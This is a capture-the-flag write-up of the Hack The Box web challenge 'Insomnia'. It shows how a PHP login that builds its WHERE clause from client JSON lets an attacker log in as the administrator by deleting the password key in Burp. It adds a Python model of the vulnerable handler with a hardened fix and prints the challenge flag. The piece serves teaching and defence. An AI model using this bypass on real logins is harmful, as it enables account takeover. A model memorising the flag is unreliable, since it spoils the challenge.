Insomnia

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of Insomnia, a web challenge from Hack The Box. The challenge ships its PHP source, so the path to the flag can be read straight out of the controllers.

First, register a throwaway account such as asdf:asdf so that there is a normal login request to intercept.

From ProfileController.php we know that the flag is only rendered when the logged-in user is the administrator account, so the goal is to obtain an administrator session without knowing that account's password.

From UserController.php we can see that the login handler passes the decoded JSON body straight into the query as the WHERE filter, so if the password field is left out, only the username is ever checked:

$db = db_connect();
$json_data = request()->getJSON(true);   // decode the JSON body into an associative array
// Meant as "reject unless exactly two fields", but PHP evaluates ! before ==,
// so this reads (!count($json_data)) == 2 and is only true for an empty body.
if (!count($json_data) == 2) {
    return $this->respond("Please provide username and password", 404);
}
// Every key/value pair the client sent becomes a WHERE condition; with only
// "username" present, no password is compared at all.
$query = $db->table("users")->getWhere($json_data, 1, 0);
$result = $query->getRowArray();
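To make the two defects concrete, here is an added example (not code from the challenge or the writeup) that models the handler's logic in Python: an in-memory SQLite table stands in for the users table, the vulnerable function builds its WHERE clause from whatever keys the client sends, exactly as getWhere($json_data, 1, 0) does, and a hardened function beside it fixes the field check and compares the password explicitly. The sample users, the administrator password and the error strings are constructed for the example and are not the challenge's real data.

```python
import hmac
import json
import sqlite3

# Constructed sample data for this example; not the challenge's real users or password.
SAMPLE_USERS = [
    ("administrator", "not-the-real-admin-password"),
    ("asdf", "asdf"),
]

ERR_FIELDS = "Please provide username and password"
ERR_CREDS = "Invalid credentials"


def make_db():
    """In-memory users table standing in for the challenge's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


def vulnerable_login(db, body):
    """Mirror of the page's UserController logic.

    Returns (username, None) on success or (None, error_message) on failure.
    """
    data = json.loads(body)
    # PHP's `if (!count($json_data) == 2)` parses as `(!count($json_data)) == 2`,
    # which is true only when the body is an empty object. That is all it enforces.
    if not isinstance(data, dict) or not data:
        return None, ERR_FIELDS
    # getWhere($json_data, 1, 0): every key the client sent becomes a column filter.
    # The identifier check only stands in for the query builder's escaping of column
    # names; it does not limit which columns the client may filter on.
    for col in data:
        if not col.isidentifier():
            raise ValueError(f"bad column name: {col!r}")
    where = " AND ".join(f'"{col}" = ?' for col in data)
    row = db.execute(
        f"SELECT username FROM users WHERE {where} LIMIT 1", list(data.values())
    ).fetchone()
    if row is None:
        return None, ERR_CREDS
    return row[0], None  # the real handler would start a session for row[0] here


def fixed_login(db, body):
    """Hardened version: fixed field set, lookup by username only, explicit password check."""
    data = json.loads(body)
    if not isinstance(data, dict) or set(data) != {"username", "password"}:
        return None, ERR_FIELDS
    if not isinstance(data["username"], str) or not isinstance(data["password"], str):
        return None, ERR_FIELDS
    row = db.execute(
        "SELECT username, password FROM users WHERE username = ?", (data["username"],)
    ).fetchone()
    # Constant-time compare; a real deployment stores a password hash and verifies it here.
    if row is None or not hmac.compare_digest(row[1].encode(), data["password"].encode()):
        return None, ERR_CREDS
    return row[0], None


if __name__ == "__main__":
    db = make_db()
    # The Burp modification from the writeup: administrator's username, no password key.
    exploit_body = json.dumps({"username": "administrator"})
    print("vulnerable:", vulnerable_login(db, exploit_body))
    print("fixed:     ", fixed_login(db, exploit_body))
```

Note that the password key has to be deleted, not emptied: a body of {"username": "administrator", "password": ""} still adds a password condition to the WHERE clause and fails, while dropping the key removes the condition entirely.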

Log in with the throwaway account and intercept the POST request in Burp Suite.

In the JSON body, change the username to the administrator account's name and delete the password key entirely (an empty password string would still be compared against the stored value). Forward the request and the server logs us in as the administrator.


Flag


Opening the profile page with the administrator session gives us the flag:

HTB{I_just_want_to_sleep_a_little_bit!!!!!}
